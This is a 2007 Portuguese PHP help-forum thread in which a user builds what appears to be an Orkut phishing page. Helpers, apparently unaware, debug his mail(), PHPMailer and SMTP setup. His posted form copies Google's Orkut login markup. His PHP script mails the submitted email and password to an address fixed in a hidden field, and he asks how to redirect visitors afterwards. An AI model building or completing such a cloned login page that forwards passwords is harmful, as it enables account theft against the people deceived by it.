Guest mister Postado Dezembro 3, 2007 Denunciar Share Postado Dezembro 3, 2007 bom eu estou montando un sitee estou com uma duvida a minha duvida é a seguintetipo na hr q alguém vai cria o usuario tem os seguintes camposloginsenha emailai ta a pessoa coloca isso e cria o usuariomais eu queria q quando ela efetuase esse cadastro o login e a senha mais uma msg criada por mim fosse enviada para o email q ela colocojá tentei de todo jeito e não consegui por isso to pedinu a ajuda akivlw galera Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 4, 2007 Denunciar Share Postado Dezembro 4, 2007 Título editado:Dúvida me ajudem -> Envio de e-mail com dados de cadastroMovido:Sugestões, Críticas e Dúvidas -> PHPPoste seu código, para vermos onde pode estar o erro.Pesquisando por formmail, mail, você encontrará muitos tópicos sobre isso Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Guest mister Postado Dezembro 4, 2007 Denunciar Share Postado Dezembro 4, 2007 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head> <title>cadastro</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> body { background-color: #D4DDED; color: #000; font-family: Verdana, Arial, sans-serif; font-size: 12px; margin: 10px } .newText { padding: 10px 20px; line-height: 1.5em; font-size: 12px; text-align: center } .magenta { color: #B11E89 } .newMain { background: #FFF; padding: 15px } .newGaia { background: #FFF; padding: 3px } .spacer { height: 7px; background-color: #D4DDED; margin: 3px -3px } .newFooter { background-color: #BCCDE9; margin: 10px 0 0 0; font-size: 12px; padding: 5px; text-align: center } .joinNow { font-size: 12px; background: #E8EEFA; padding: 8px 3px; text-align: center; line-height: 1.7em } a:link { color: #0047BE; text-decoration: underline; font-size: 100% } a:visited { color: #0047BE; text-decoration: underline } a:hover { color: #C40098; text-decoration: underline } </style><script><!--function gaia_onLoginSubmit() { if (window.gaiacb_onLoginSubmit) { return gaiacb_onLoginSubmit(); } else { return true; }}function gaia_setFocus() { var f = null; if (document.getElementById) { f = document.getElementById("gaia_loginform"); } else if (window.gaia_loginform) { f = window.gaia_loginform; } if (f) { if (f.Email.value == null || f.Email.value == "") { f.Email.focus(); } else { f.Passwd.focus(); } }}--></script> <style type="text/css"><!-- div.errormsg { color: red; font-size: smaller; font-family:arial,sans-serif; } font.errormsg { color: red; font-size: smaller; font-family:arial,sans-serif; } --></style> <style type="text/css"><!--.gaia.le.lbl { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }.gaia.le.fpwd { font-family: Arial, Helvetica, sans-serif; font-size: 70%; }.gaia.le.chusr { font-family: Arial, Helvetica, sans-serif; font-size: 70%; }.gaia.le.val { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }.gaia.le.button { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }.gaia.le.rem { font-family: Arial, Helvetica, sans-serif; font-size: smaller; }.gaia.captchahtml.desc { font-family: arial, sans-serif; font-size: smaller; } .gaia.captchahtml.cmt { font-family: arial, sans-serif; font-size: smaller; font-style: italic; }--></style></head><body> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <!--DWLayoutTable--> <tbody> <tr> <td width="983" height="137" valign="top" class="newGaia"> <div id="gaia_loginbox"> <table class="form-noindent" cellspacing="0" cellpadding="5" width="100%" border="0"> <tr> <td valign="top" style="text-align:center" nowrap="nowrap" bgcolor="#E8EEFA"> <form id="gaia_loginform" action="aki vai o site por onde vai se enviado o email é aki q eu não sei uq eu ponho" method="post" onsubmit="return(gaia_onLoginSubmit());"> <table id="gaia_table" align="center" border="0" cellpadding="1" cellspacing="0"> <!--DWLayoutTable--> <tr> <td height="22" colspan="2" valign="top"><input type="hidden" name="continue" id="continue" value="http://meu site" /> <input type="hidden" name="service" id="service2" value="orkut" /> <input type="hidden" name="rm" id="rm2" value="false" /> <input type="hidden" name="hl" id="hl2" value="pt-BR" /> </td> </tr> <tr> <td width="81" height="27" valign="top" nowrap="nowrap"> <div align="right"> <span class="gaia le lbl"> E-mail: </span> </div> </td> <td width="247" valign="top"> <input type="text" name="Email" value="" class="gaia le val" id="Email" size="40"> </td> </tr> <tr> <td height="27" align="right" valign="top"> <span class="gaia le lbl"> Senha: </span> </td> <td valign="top"> <span class="gaia le rem"> <input type="password" name="Passwd2" class="gaia le val" id="Passwd2" size="40"> </span></td> </tr> <tr> <td height="29"> </td> <td align="left" valign="top"> <input type="submit" class="gaia le button" name="signIn" value="criar" /> </td> </tr> <tr> <td height="3"></td> <td></td> </tr> <script type="text/javascript"><!-- function onPreCreateAccount() { return true; } function onPreLogin() { if (window["onlogin"] != null) { return onlogin(); } else { return true; } } --></script> <input type="hidden" name="para" value="aki vai u email do cara"> </table> </form> </td> </tr> </table> </div><div class="spacer"></div> </td> </tr> </tbody> </table> <div class="newFooter">by mister </div> </body> </html>[/codebox]bom ai ta o codigo ai como eu vo faze meu site sobre o orkut eu consegui esse codigo ai não é?só q eu nau consigo cria o lugar pra ele coloca o login nem edita pra enviar o email olha ai pra mimdependendo me da ideia q eu começo tudo de novo heheh vlw Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 4, 2007 Denunciar Share Postado Dezembro 4, 2007 Esse é só o código do formulário.Você ainda não montou o script PHP para o envio?Veja:http://scriptbrasil.com.br/forum/index.php?showtopic=82939Tente criar um formulário simples. Após fazê-lo funcionar, comece a aumentar os campos e montar formulários maiores. Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Guest mister Postado Dezembro 4, 2007 Denunciar Share Postado Dezembro 4, 2007 vlw fimuito obrigado mesmo é bom ver q existem pessoas dispostas a judarqualqr coisa é só falaxD apesar deu ser um lamer :P Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 4, 2007 Denunciar Share Postado Dezembro 4, 2007 Beleza. Dê uma olhada no artigo, pesquise outros, se precisar.Se não conseguir, volte aqui.E, se puder, registre-se no fórum. ;) É bem melhor.Abraço,Beraldo Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 4, 2007 Denunciar Share Postado Dezembro 4, 2007 tipo eu fiz fraga ai quan do eu entro aparece isso ai ohWarning: mail() [function.mail]: Safety Restriction in effect. The mail() command is not allowed, contact the admin. in /www/110mb.com/c/a/b/u/l/o/s/o/cabuloso/htdocs/cadastro.php on line 41Erro ao enviar o E-Mailna linha 41conten isso aiif (mail ($para, $assunto, $mensagem, $header))(obs: registrado xD) Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 4, 2007 Denunciar Share Postado Dezembro 4, 2007 A diretiva safe_mode está ativada? Acho que se estiver, a função mail() não poderá ser usada. Use SMTP. A classe PHPMailer é ótima para isso.http://phpmailer.sourceforge.nethttp://www.vivaolinux.com.br/dicas/verDica.php?codigo=2476para verificar os valores das diretivas, veja no php.ini ou por este script:phpinfo.php<?php phpinfo(); ?>(obs: registrado xD):D Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 4, 2007 Denunciar Share Postado Dezembro 4, 2007 (editado) tipo uq eu quero é enviar tipo aquele email de quando eu registrei nu site akiu script lá enviaria para u meu email fragaacho q u erro q aonteceu foi porque eu tentei coloca u email de envio como uma variavel fraga axo q esse foi u problema<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/css" media="screen"> <!-- body { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; margin: 15px; background: #666; } </style> <title>cadastro</title> </head> <body> <?php $Email = $_POST['Email']; $Passwd = $_POST['Passwd']; $para = $_POST['para']; $para = $para; $mensagem = " <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.1//EN\" \"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd\"> <html xmlns=\"http://www.w3.org/1999/xhtml\"> <head> <title>aki é u assunto da mag?</title> </head> <body> Login: <strong>$Email</strong><br /> senha: <strong>$Passwd</strong><br /> aki uma msg do meu site para a pessoa q registro </body></html> "; $header = "MIME-Version: 1.0\r\n"; $header .= "Content-type: text/html; charset=iso-8859-15\r\n"; $header .= "From: MisterM@mister.com"; if (mail ($para, $assunto, $mensagem, $header)) echo "E-Mail enviado!"; else echo "Erro ao enviar o E-Mail"; ?> </body> </html>qual o erro fiz tudo certo deacordo com aquele tópico seueu acho q u erro esta na varialvel do email mais não consigo resolveloA diretiva safe_mode está ativada? Acho que se estiver, a função mail() não poderá ser usada. Use SMTP. A classe PHPMailer é ótima para isso.http://phpmailer.sourceforge.nethttp://www.vivaolinux.com.br/dicas/verDica.php?codigo=2476para verificar os valores das diretivas, veja no php.ini ou por este script:phpinfo.phpCODE<?phpphpinfo();?>num intendi isso ai nãotipo uq eu quero faze não sei ce você intendeu é q quando o cara registra ele recebe um meial contendo senha e login fraga e uma msg de boas vindas do siteé uq eu tentei faze com o tópico q você me mostrou mais ai eu não conseguie tipo quiria temen q quando ela criase a conta ela fose redirecionada para um sitepra não cai naquela janela lá de envio de emailce você souber como faz isso me e ve se eu to cheganu perto com esse codigo aifalou Editado Dezembro 5, 2007 por Mister M Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 ESerra Postado Dezembro 6, 2007 Denunciar Share Postado Dezembro 6, 2007 O seu servidor não permite o envio de e-mail utilizando a função mail (que é o modo mais fácil), então vai ter que utilizar algum outro método por SMTP, como por exemplo, a classe phpmailer (link que foi passado).Ps.: Leia as regras do fórum, up não pode... Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 6, 2007 Denunciar Share Postado Dezembro 6, 2007 (editado) vlw broder vo tenta aki faloua foi mal por ter dado upabraços------------------------------------------------------------------------------------------------------------------------------------------tipo eu to tentando mais não sei onde eu to erranuporque com esse codigo ensina a envia o email pra um eamil fixo não um variavel ai eu fiz assim$Email = $_POST['Email']; $Passwd = $_POST['Passwd']; $para = $_POST['para']; $mail = new PHPMailer(); $mail->IsHTML(true); $mail->WordWrap = 50; $mail->IsSMTP(); $mail->SMTPAuth = true; $mail->Mailer = "smtp"; $mail->Host = "smtp.mail.yahoo.com"; $mail->Username = "aki meu usuario"; $mail->Password = "aki minha senha"; $mail->From = "aki meu email"; $mail->FromName = "aki meu nome"; $mail->AddAddress("$para"); // aki eu coloquei a variavel $mail->Body = " login = $Email senha = $Passwd aki a msg do meu site"; $mail->Subject = "aki o titulo d amsg"; if(!$mail->Send()){ return false; } else { return true; } ?>sabe onde ta u erro?e otra coisa tipo quando eu utilizo isso ai fica na pagina contendo minha senha meu login essas paradaai eu queria sabe ce tem como redireciona pra outra pagina sem q as pessoas tenham aceso ao codigo fonte ta ligado Editado Dezembro 7, 2007 por Mister M Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 7, 2007 Denunciar Share Postado Dezembro 7, 2007 Aparece algum erro?Faça assim e veja se retorna algum erro:if(!$mail->Send()){ echo "ok"; } else { echo "erro: " . $mail>ErrorInfo; }Os códigos PHP não aparecem no HTML final. Portanto seus dados não serão visíveis Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 7, 2007 Denunciar Share Postado Dezembro 7, 2007 (editado) não aparece erro nadao que aparece e uma pagina branca com tudo q tah escrito no scriptmais tipo eu não frago pra q q serve aquela parada q eu baxei nãoe eu coloquei a parada lá não envio email com erro tamen nãoe continuo mostranu minbhas coisa tudotiop abre uma pgina embranco com tudo escrito login essas paradae como eu vo faze pra redireciona?vlw Editado Dezembro 7, 2007 por Mister M Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 7, 2007 Denunciar Share Postado Dezembro 7, 2007 Veja se você abriu a tag PHP corrretamente (<?php em vez de <?).Se mesmo assim não funcionar, talvez a extensào PHP não foi carregada.Execute este script e veja o que ocorre:phpinfo.php<?php phpinfo(); ?> Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 7, 2007 Denunciar Share Postado Dezembro 7, 2007 (editado) agora eu cunsertei a tag php e deu isso aiFatal error: Class 'PHPMailer' not found in /www/110mb.com/t/e/s/t/e/teste/htdocs/cadastro.php on line 6na linha 6 ten isso ai oh$mail = new PHPMailer();noss fi cada hr é um problema viu=[php info =System Linux debian 2.6.18-3-686-bigmem #1 SMP Mon Dec 4 18:07:02 UTC 2006 i686 Build Date Mar 16 2007 07:35:38 Configure Command './configure' '--enable-memory-limit' '--disable-debug' '--with-regex=php' '--disable-rpath' '--disable-static' '--with-pic' '--with-layout=GNU' '--with-pear=/usr/share/php' '--enable-calendar' '--enable-sysvsem' '--enable-sysvshm' '--enable-sysvmsg' '--enable-track-vars' '--enable-trans-sid' '--enable-bcmath' '--with-bz2' '--enable-ctype' '--with-db4' '--with-iconv' '--enable-exif' '--enable-filepro' '--enable-ftp' '--with-gettext' '--enable-mbstring' '--with-pcre-regex=/usr' '--enable-shmop' '--enable-sockets' '--enable-wddx' '--disable-xml' '--with-expat-dir=/usr' '--with-xmlrpc' '--enable-yp' '--enable-dio' '--with-zlib' '--without-pgsql' '--with-kerberos=/usr' '--with-openssl=/usr' '--with-zip=/usr' '--enable-dbx' '--with-mime-magic=/usr/share/misc/file/magic.mime' '--with-exec-dir=/usr/lib/php4/libexec' '--prefix=/usr' '--with-apxs2=/usr/bin/apxs2' '--with-config-file-path=/etc/php4/apache2' '--with-jpeg-dir=/usr/lib' '--with-gd' '--with-curl' '--with-mysql' Server API Apache 2.0 Handler Virtual Directory Support disabled Configuration File (php.ini) Path /etc/php-users.ini PHP API 20041225 PHP Extension 20050922 Zend Extension 220051025 Debug Build no Thread Safety disabled Zend Memory Manager enabled IPv6 Support enabled Registered PHP Streams php, file, http, ftp, compress.bzip2, compress.zlib, https, ftps Registered Stream Socket Transports tcp, udp, unix, udg, ssl, sslv3, sslv2, tls Registered Stream Filters string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, convert.iconv.*, bzip2.*, zlib.* Editado Dezembro 7, 2007 por Mister M Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 7, 2007 Denunciar Share Postado Dezembro 7, 2007 Esse erro simplesmente ocorre pois a classe não foi encontrada.Verifique se voc6e usou require/include para incluir o arquivo class.phpmailer.php Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 7, 2007 Denunciar Share Postado Dezembro 7, 2007 noh como assim não intendisou muito lamer em linguagen de programaçaum Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 7, 2007 Denunciar Share Postado Dezembro 7, 2007 require "class.phpmailer.php";Estude as funções. http://www.php.net/requirehttp://www.php.net/includeVeja a documentação do PHPMailer, no site oficial. Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 7, 2007 Denunciar Share Postado Dezembro 7, 2007 (editado) pira aew inton agora deu esse pal aewWarning: require(class.phpmailer.php) [function.require]: failed to open stream: No such file or directory in /www/110mb.com/t/e/s/t/e/teste/htdocs/cadastro.php on line 2Warning: require(class.phpmailer.php) [function.require]: failed to open stream: No such file or directory in /www/110mb.com/t/e/s/t/e/teste/htdocs/cadastro.php on line 2Fatal error: require() [function.require]: Failed opening required 'class.phpmailer.php' (include_path='.:/usr/share/php') in /www/110mb.com/t/e/s/t/e/teste/htdocs/cadastro.php on line 2aff ow foi mal ai se eu to te amolando mais é porque eu quero muito faze isso fraga Editado Dezembro 7, 2007 por Mister M Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 7, 2007 Denunciar Share Postado Dezembro 7, 2007 É só prestar atenção na mensagem de erro. O arquivo class.phpmailer.php não foi encontrado.veja se ele está no mesmo diretório do script. Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 7, 2007 Denunciar Share Postado Dezembro 7, 2007 suahuash novo erroputs cada ora é um :blink: Warning: fsockopen() [function.fsockopen]: unable to connect to smtp.mail.yahoo.com:25 (Unknown error) in /www/110mb.com/t/e/s/t/e/teste/htdocs/email/class.smtp.php on line 122okosso só dou trabalhousahuashnoh tipo com u smtp dá um erro lámais ai eu coloquei em vez de smtp pop3 ai não deu erro nanhumapareçeu a mesmo de ok tipo como se tivesse enviadoai eu fui nu meu email e não chego nadasera q não tem nenhum jeito de enviar por po3 nãose tiver me ensina aewe se não tenta me ajudar aivlw Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 7, 2007 Denunciar Share Postado Dezembro 7, 2007 A minha conta no Yahoo é no .com.br, não .com. Não sei se o .com usa esse mesmo endereço de envio. Tente com mail.yahoo.com. smtp.yahoo.com.Não envio com POP3. Não tenho como ensinar. :( Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 7, 2007 Denunciar Share Postado Dezembro 7, 2007 minha conta tamen é nu .com.bre nu php ta .com.brmais vo tenta só .com Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 8, 2007 Denunciar Share Postado Dezembro 8, 2007 unable to connect to smtp.mail.yahoo.com:25tem certeza de que voc6e colocou .com.br? :unsure: Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Mister M Postado Dezembro 8, 2007 Denunciar Share Postado Dezembro 8, 2007 noh é mesmo tava olhanu nu script errado tava .comhehehvo ve lá se vai daaff mais da isso agoraWarning: fsockopen() [function.fsockopen]: unable to connect to smtp.mail.yahoo.com.br:25 (Unknown error) in /www/110mb.com/t/e/s/t/e/teste/htdocs/email/class.smtp.php on line 122no class.smtp.php na linha 122 tem isso ai oh $tval); # give up after ? secsow ta osso emsauhaus Citar Link para o comentário Compartilhar em outros sites More sharing options...
0 Beraldo Postado Dezembro 8, 2007 Denunciar Share Postado Dezembro 8, 2007 Como está seu script atualmente. Citar Link para o comentário Compartilhar em outros sites More sharing options...
Pergunta
Guest mister
bom eu estou montando un site
e estou com uma duvida
a minha duvida é a seguinte
tipo na hr q alguém vai cria o usuario tem os seguintes campos
login
senha
email
ai ta a pessoa coloca isso e cria o usuario
mais eu queria q quando ela efetuase esse cadastro o login e a senha mais uma msg criada por mim fosse enviada para o email q ela coloco
já tentei de todo jeito e não consegui por isso to pedinu a ajuda aki
vlw galera
Link para o comentário
Compartilhar em outros sites
41 respostass a esta questão
Posts Recomendados
Participe da discussão
Você pode postar agora e se registrar depois. Se você já tem uma conta, acesse agora para postar com sua conta.